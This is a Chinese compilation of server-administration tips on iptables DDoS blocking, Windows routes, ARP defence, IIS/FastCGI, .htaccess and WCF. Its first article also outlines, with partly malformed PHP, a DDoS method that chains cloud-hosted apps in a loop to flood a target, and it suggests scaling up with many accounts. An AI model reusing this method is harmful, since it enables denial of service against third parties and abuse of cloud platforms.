以下是小编帮大家整理的服务器被DDOS攻击防御脚本总结Windows服务器操作系统,本文共8篇,供大家参考借鉴,希望可以帮助到您。

篇1:服务器被DDOS攻击防御脚本总结Windows服务器操作系统
服务器给ddos攻击我收集了两种脚本代码一种是linux shell命令实现攻击,另一种就是可在任何环境下支持php代码,下面我把源码贴出来,大家可参考,
服务器被DDOS攻击防御的SHELL脚本
1.编写脚本
mkdir /root/bin
vi /root/bin/dropip.sh
#!/bin/bash
/bin/netstat -na|grep ESTABLISHED|awk ‘{print $5}’|awk -F: ‘{print $1}’|sort|uniq -c|sort -rn|head -10|grep -v -E ’192.168|127.0′|awk ‘{if ($2!=null && $1>4) {print $2}}’>/tmp/dropip
for i in $(cat /tmp/dropip)
do
/sbin/iptables -A INPUT -s $i -j DROP
echo “$i kill at `date`”>>/var/log/ddos
done
2.增加执行权限
chmod +x /root/bin/dropip.sh
3.添加到计划任务,每分钟执行一次
crontab -e
*/1 * * * * /root/bin/dropip.sh
说明:
最重要的是第二行,获取ESTABLISHED连接数最多的前10个ip并写入临时文件/tmp/dropip,排除了内部ip段192.168|127.0开头的.通过for循环将dropip里面的ip通过iptables全部drop掉,然后写到日志文件/var/log/ddos
还一种方法就是利用php写ddos攻击,利用其它云平台来操作
主要使用sinaapp作为测试对象,
测试思路:创建4个版本的app.
版本1 主页代码如下:
file_get_contents('2.mars.sinaapp.com/');//版本1触发攻击(访问版本2)
>
版本2 主页代码:
file_get_contents('www.xxx.com/ip.php')://攻击目标
file_get_contents('3.mars.sinaapp.com/');//访问版本3
>
版本3 主页代码:
for ($i=1; $<=10; $i++){//这里邪恶了一下,多来几次效果更佳
file_get_contents('www.xxx.com/ip.php');
file_get_contents('4.mars.sinaapp.com/'); }
>
版本4 主页代码:
file_get_contents('2.mars.sinaapp.com/');//访问版本2,导致死循环
>
以上是使用一个sinaapp用户进行攻击的步骤,可以自己扩展,注册大量用户及创建更多的版本进行攻击。但在测试过程中发现,每个APP实际上有两个IP出口。使用多个用户效果会更好。
篇2:给Windows服务器添加永久路由的脚本Windows服务器操作系统
下面我来看一个关于给Windows服务器添加永久路由的脚本的方法,这些脚本并不难非常的简单,希望此例子对各位同学会有所帮助哦,
功能并不强大,但因为偶尔也会用到,这里我还是贴出来看看,给大伙们考评考评。工作了,很少再做一些玩趣的事情了。这东西也是源于工作需要才写的。
事情是这样的,如果购买的双线或者三线带宽,这类产品非BGP产品,能够自动选择来自三大ISP运营商最佳线路进行返回数据,单线的这里就不谈哈。那么双线或者三线是如何实现选择最佳线路给用户返回数据呢。这里我们可以控制我们放置在机房的服务器上,就Windows服务器说,可以添加永久路由来实现,但实现起来相对繁琐,不像Linux服务器那么简单快捷。都好,那么这里就说说Windows服务器添加永久路由的事情。
有人会疑问:为何只有一个物理网卡(想象一条物理链路)还可以这样呢。原因是,通过IP头封装的网络地址,从物理线路出去,然后就交给运营商的路由器处理了。路由器通过IP头,自身选择最佳路由返回数据给用户。
好吧,看看脚本:
代码如下复制代码@echo offecho 请输入您的移动网关:
set /p G=:
echo .
echo 确定输入网关正确就回车继续
echo .
pause
route -p add 192.168.0.0 mask 255.255.0.0 %G%
…
…
…
route -p add 192.168.1.0 mask 255.255.255.0 %G%
ping -n 3 %G%
echo.
echo.
if %errorlevel% equ 0 echo 服务器永久路由已生效
if %errorlevel% equ 1 echo 网关不可达
echo.
pause
如若上面网关为192.168.2.1 是你的运营商给的联通网关。假设是来自联通的用户访问。那么用户数据包IP报头会有个Ip标识,路由器是识别为该IP即是来自联通ISP的用户访问。那么服务器返回数据包的报头同样会封装个类似的IP包头从物理网卡出去到路由器。路由器识别后就按照联通线路返回了。
Windows添加路由的参数:
代码如下复制代码C:\Windows\system32>route
操作网络路由表。
代码如下复制代码ROUTE [-f] [-p] [-4|-6] command [destination]
[MASK netmask] [gateway] [METRIC metric] [IF interface]
-f 清除所有网关项的路由表。如果与某个
命令结合使用,在运行该命令前,
应清除路由表。
-p 与 ADD 命令结合使用时,将路由设置为
在系统引导期间保持不变。默认情况下,重新启动系统时,
不保存路由。忽略所有其他命令,
这始终会影响相应的永久路由,
-4 强制使用 IPv4。
-6 强制使用 IPv6。
command 其中之一:
PRINT 打印路由
ADD 添加路由
DELETE 删除路由
CHANGE 修改现有路由
destination 指定主机。
MASK 指定下一个参数为“netmask”值。
netmask 指定此路由项的子网掩码值。
如果未指定,其默认设置为 255.255.255.255。
gateway 指定网关。
interface 指定路由的接口号码。
METRIC 指定跃点数,例如目标的成本。
用于目标的所有符号名都可以在网络数据库
文件 NETWORKS 中进行查找。用于网关的符号名称都可以在主机名称
数据库文件 HOSTS 中进行查找。
如果命令为 PRINT 或 DELETE。目标或网关可以为通配符,
(通配符指定为星号“*”),否则可能会忽略网关参数。
如果 Dest 包含一个 * 或 ?,则会将其视为 Shell 模式,并且只
打印匹配目标路由。“*”匹配任意字符串,
而“?”匹配任意一个字符。示例: 157.*.1、157.*、127.*、*224*。
只有在 PRINT 命令中才允许模式匹配。
诊断信息注释:
无效的 MASK 产生错误,即当 (DEST & MASK) != DEST 时。
示例: >route ADD 157.0.0.0 MASK 155.0.0.0 157.55.80.1 IF 1
路由添加失败: 指定的掩码参数无效。
(Destination & Mask) != Destination。
示例:
代码如下复制代码>route PRINT
>route PRINT -4
>route PRINT -6
>route PRINT 157* …. 只打印那些匹配 157* 的项
>route ADD 157.0.0.0 MASK 255.0.0.0 157.55.80.1 METRIC 3 IF 2
destination^ ^mask ^gateway metric^ ^
Interface^
如果未给出 IF,它将尝试查找给定网关的最佳
接口。
代码如下复制代码>route ADD 3ffe::/32 3ffe::1
>route CHANGE 157.0.0.0 MASK 255.0.0.0 157.55.80.5 METRIC 2 IF 2
CHANGE 只用于修改网关和/或跃点数。
代码如下复制代码>route DELETE 157.0.0.0
>route DELETE 3ffe::/32
篇3:Windows系统防ARP攻击的几种方法总结Windows服务器操作系统
我想很多朋友都碰到过ARP攻击这种情况,导致流量大增或网站电脑打不开,下面我来给大家总结了常用见的解决ARP攻击的方法,有需要的朋友可参考,
防止ARP攻击方法一 设置权限文件方法
一、常规方式:
开始——运行,输入“regedit”,回车,通过“注册表——查找”,输入“AntiARP”,一个一个删除“AntiARP”注册表信息。
二、非常规方式(通过“安全模式”进入系统,关闭网络连接,拔掉网线):
根据ARP攻击原理:删除调用系统里的npptools.dll文件。如果你把这个DLL文件删除了,之后随便弄个DLL改名为npptools.dll即可。
防攻击文件:C:/WINDOWS/system32/ npptools.dll
处理方法:新建一个空文本文档,改名为npptools.dll然后把它复制到system32文件夹里,覆盖原有的npptools.dll,如果没关闭文件保护,先关闭。再把system32/dllcache里的npptools.dll也覆盖了,然后把它们的属性改为只读、隐藏,最后再把它们的everyone权限都去掉,即可!
npptools.dll文件的属性改为只读、隐藏后,再把它们的everyone的权限去掉,病毒就不能替换也不能使用它了,arp就不会起作用,从而达到防范ARP的目的。
如果C盘是NTFS分区格式就把权限都去掉,如果是FAT格式弄个只读就可以了
防止ARP攻击方法二 网关绑定方法
1.在预装好操作系统后成功远程连接后,可以发现在桌面上有贝壳ARP防火墙,安装防火墙是一个非常有效的方法建议用户第一时间安装
2.可以使用CMD命令对网关进行绑定。
在开始→运行→输入CMD后首先输入arp -a如图 dynamic “动态”
接下来我们输入arp -s对网关进行绑定 如图
最后我们来查看一下绑定状态 已经变为 static “静态”
当电脑上做绑定网关之后,就不会收到ARP欺骗攻击,向伪造的网关的 IP/MAC发送消息
Windows 7下修改网卡Mac地址,可以轻松防御ARP攻击
第一步:建立拨号连接
我们新建一个宽带连接(开始->控制面板->网络和Internet->查看网络状态和任务》设置新的连接或网络->连接到 Internet->接下来一步一步做就行了),我这儿建的名为“宽带连接 2”,然后在属性里找到选项,把里面的连接时显示进度和提示名称,密码和证书等前的对号都去掉,确定,
第二步:修改注册表
然后,Win+R(调出运行对话框),我们输入regedit,确定,这样就打开了注册表,注册表打开后,找到 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 然后在右边的窗口中新建一个字符串键,名字任取,双击此键输入键值为c:\Windows\System32\rasphone -d “宽带连接 2”(注:我的宽带连接名为“宽带连接 2”,这儿要输入你的宽带连接的名称哦),这样你可以在运行里输入msconfig找启动项看一下是不是加入了一个Windows启动项,而它的命令里就是我们的c:\Windows\System32\rasphone -d “宽带连接 2”
最后给大家总结一下防止方法
1)病毒源,对病毒源头的机器进行处理,杀毒或重新装系统。
(2)网吧管理员检查局域网病毒,安装杀毒软件。
(3)给系统安装补丁程序。
(4)给系统管理员帐户设置足够复杂的强密码。
(5)经常更新杀毒软件,安装并使用网络防火墙软件。
(6)关闭一些不需要的服务,条件允许的可关闭一些没有必要的共享,也包括C$、D$等管理共享。完全单机的用户也可直接关闭Server服务
(7)建议用户不要随便点击打开QQ、MSN等聊天工具上发来的链接信息,以免病毒的传播。
个人建义
其实我们可以在电脑中安装一个360软件就可以直接解决这个问题哦,因为360内置了防arp攻击软件哦。
篇4:IIS+PHP错误FASTCGI Error错误总结Windows服务器操作系统
下面我来给各位总结一在iis+php中使用FASTCGI加速php常见的一些FASTCGI Error错误总结,希望本文章对你会有所帮助,
FastCGI Error
The FastCGI Handler was unable to process the request. //FastCGI处理程序无法处理请求。
--------------------------------------------------------------------------------
Error Details:
Unable to place a FastCGI process in a JobObject. Try disable the Application Pool CPU Limit feature
//无法放置在JobObject FastCGI进程。尝试禁用应用程序池的CPU监视功能
Error Number: 5 (0x80070005).
Error Description: ?ü??·??ê?£
HTTP Error 500 - Server Error.
Internet Information Services (IIS)
根据上面的出错提示找到了原因,原来我在应用程序池中启用了CPU监视,FASTCGI模式不支持CPU监视,禁用CPU监视后就正常了。
FastCGI Error Error Number: -2147467259 (0x8000
FastCGI Error
The FastCGI Handler was unable to process the request.
Error Details:
The FastCGI process has failed frequently recently. Try the request again in a while
Error Number: -2147467259 (0x80004005).
Error Description: Î′Ö¸¶¨μÄ′íÎó
HTTP Error 500 - Server Error.
Internet Information Services (IIS)
和
FastCGI Error
The FastCGI Handler was unable to process the request.
Error Details:
The FastCGI process exited unexpectedly
Error Number: -1073741819 (0xc0000005).
Error Description: Unknown Error
HTTP Error 500 - Server Error.
Internet Information Services (IIS)
在网上找了一大堆资料和在国外论坛详细查询了下,一直没有找到解决办法,
php.ini也不知道被我修改了多少次了,也不见效果。
无奈之下,发现php-cgi.exe是可以直接运行程序,双击运行一下,发现提示缺少msvcr71.dll,运行不成功,直接下载msvcr71.dll文件放到
C:/Windows/System/System32
C:/Windows/System
C:/Windows
篇5:Windows创建.htaccess文件方法总结Windows服务器操作系统
在windows系统中规定不能使用无文件名的文件,这种说法好像让我们无法在Windows创建.htaccess文件了,其它方法还是有的,下面我来介绍Windows创建.htaccess文件几种方法,
创建的多种方法:
1、使用DOS命令,在DOS下有三种方法可供选择:
使用屏幕编辑命令copy con .htaccess后回车,输入内容,最后按下ctrl+z结束编辑,就成功生成了.htaccess;
使用重命名命令ren 1.txt .htaccess ,这是最常规的方法了,在windows窗口下不能执行的命令,在cmd下却如履平地;
使用重定向命令 echo. >.htaccess,这里将一个回车符输入到.htaccess,同样能创建成功;
2、用winrar的文件管理器
先新建一文本文档,然后打开winrar主界面,定位到该文件,可以直接重命名,这是我在解压一国外开源项目时,其自带的.htaccess居然能正确解压出来时,所得到的启发,当然你使用7zip之类的管理器也是可以的
3、直接通过文本编辑工具保存,例如记事本,ultraEdit等等,不过保存的时候选择所有文件就可以了
4、使用php中的文件创建方法,fopen,file_put_contents文件名直接取.htaccess就成,
5、最简单的方法:找个Linux服务器,用ftp软件上传一个txt文件,然后在服务器上面重命名为.htaccess,这个方法最简单了,呵呵。
6、打开Windows的记事本---“文件->另存为”---在另存为的“保存类型”下拉选单中选取“所有文件”类型---在“文件名”中输入.htaccess---保存
篇6:iis与apache取消目录脚本执行权限方法Windows服务器操作系统
本文章以dedecms目录安全为实例来取消相关目录的执行权限,如DedeCMS系统,可写入的有两个目录data、uploads,data目录主要是基本配置文件和缓存数据,uploads则是附件上传保存的目录都不需要执行权限的,下面我给大这具体介绍介绍,
打开IIS中站点,在站点uploads目录、data目录以及静态html生成目录点击右键,菜单中选择“属性”,在目录属性面板选择执行权限为“无”即可。(如图1)
(图1)
IIS7也类似于IIS6.0,选择站点对应的目录,data、uploads及静态html文件目录,双击功能试图面板中的“处理程序映射”(如图2)
(图2)
在“编辑功能权限……”中,我们直接去除脚本的执行权限即可。(如图3)
(图3)
在Apache中,没有Windows 下IIS的图形管理界面,我们需要手工修改下apache的配置文件,来进行目录脚本的执行权限的设定。
首先我们找到apache的配置文件httpd.conf,通常情况下,该配置文件在apache安装目录下的conf文件夹中(如图4),
(图4)
打开httpd.conf文件,找到内容中如图5的位置:
(图5)
将需要限制执行脚本文件的目录配置添加到下方
代码如下
复制代码
Deny from all
配置内容中的DIR为需要限制执行脚本文件的目录,FilesMatch后的内容为需要限定的执行的脚本后缀名。例如:这里需要禁止测试站点uploads文件夹下的PHP,ASP,JSP脚本的运行,则进行如下图6配置:
(图6)
在配置完成后,重启一下apache,配置便生效!
在操作前,uploads文件夹下我新建了一个index.php文件,图7为未作配置前访问情况
(图7)
图8为重启apache后访问该页面的效果。
篇7:IIS8中添加WCF支持几种方法总结Windows服务器操作系统
最近在做Silverlight,Windows Phone应用移植到Windows 8平台,在IIS8中测试一些传统WCF服务应用,发现IIS8不支持WCF服务svc请求,后来发现IIS8缺少对WCF服务的Managed Handler,按照以下步骤添加后,IIS8即支持WCF服务。
1. 首先添加MIME类型 扩展名“.svc”,MIME类型 “application/octet-stream”
2. 然后在“Handler Mappings”中添加Managed Handler,
Request path: *.svc
Type: System.ServiceModel.Activation.HttpHandler
Name: svc-Integrated
篇8:IIS8中添加WCF支持几种方法总结Windows服务器操作系统
另外一种解决方法,
图-1
图-2
解决方法:
只需在“启用或关闭Windows功能”添加如下功能(红线标注):
之后,会看到在IIS的 “处理程序映射”中就会有:
好了,“在IIS8中添加WCF服务支持”的问题就迎刃而解
★IIS+PHP错误FASTCGI Error错误总结Windows服务器操作系统
★windows rsync两台服务器目录同步功能实现Windows服务器操作系统
★IIS8中添加WCF支持几种方法总结Windows服务器操作系统
★iis中wordpress 伪静态中文标签tag的设置Windows服务器操作系统
★linux两台服务器间copy传输文件的最简单方法linux操作系统
文档为doc格式